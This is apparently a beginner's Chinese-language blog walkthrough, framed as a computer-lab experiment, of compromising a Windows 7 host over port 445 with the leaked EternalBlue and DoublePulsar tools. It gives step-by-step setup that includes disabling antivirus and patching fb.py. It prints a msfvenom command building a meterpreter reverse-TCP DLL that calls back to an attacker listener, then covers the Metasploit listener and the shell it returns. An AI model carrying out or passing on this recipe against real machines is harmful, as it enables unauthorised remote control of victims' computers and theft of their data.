靶机:Windows7 445端口开放
废话不多说,开始小白的探索之路。。
大家可以先到https://github.com/x0rz/EQGRP_Lost_in_Translation/tree/master/windows上去下载工具,下载完后解压到某个文件夹(当然你可以适当的禁止一些杀毒软件)。
首先要对自己的电脑进行Python环境的设置,我也是看别人实验的过程,首先下载python2.6或python3.2版本(注意应当下32位的,不然后面好像会出错),因为我下的是Python2.6版本的,下面就以这个版本进行说明。可以在https://www.python.org/downloads/进行下载,我那时选的是2.6.4版本的,其他的应当都可以,下载好后,还要进行路径的配置,这个网上一搜一大堆,就不说了。接下来还要下载pywin32,可以参考http://jingyan.baidu.com/article/22fe7ced1ca36b3003617f7a.html进行下载安装(我是直接下载他红线框标的下面2.6的那个可以用),完成环境的配置后,进入到解压的文件夹,然后进入\windows这个目录下找到fb.py这个文件,将26,27,28,72行注释掉。
注释完以后,打开cmd,进入到fb.py文件的位置用python2.6运行文件。(之前应关闭相应的杀毒软件。。)
这一切都完成后,并且正确后应如下图所示
接下来按他要求的进行输入
一路回车,然后使用use Eternalblue
一路回车,下图中的那个选择1
一路回车出现下图则表示这个模块使用成功
输入 use Doublepulsar
一路回车,选择目标机的版本
如下图所选,那个s.dll是在kail中用msf生成的一个dll文件(下面是怎样生成的),我这里是复制到E盘根目录下
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.4.115.189 lport=5555 -f dll > s.dll(要先进入‘/’目录下及cd /)
用kail中的metasploit进行相关的配置开始监听
回到cmd,一路回车,如下为成功
kail中返回一个shell
help一下,发现有很多功能。。。
screenshot截一下图
以上就是小白在机房实验的全过程。。。
大家还可以自己探索更多的功能。
以下两个网页供大家参考
http://www.myhack58.com/Article/60/63/2017/85384_2.htm
http://www.qingpingshan.com/pc/aq/253048.html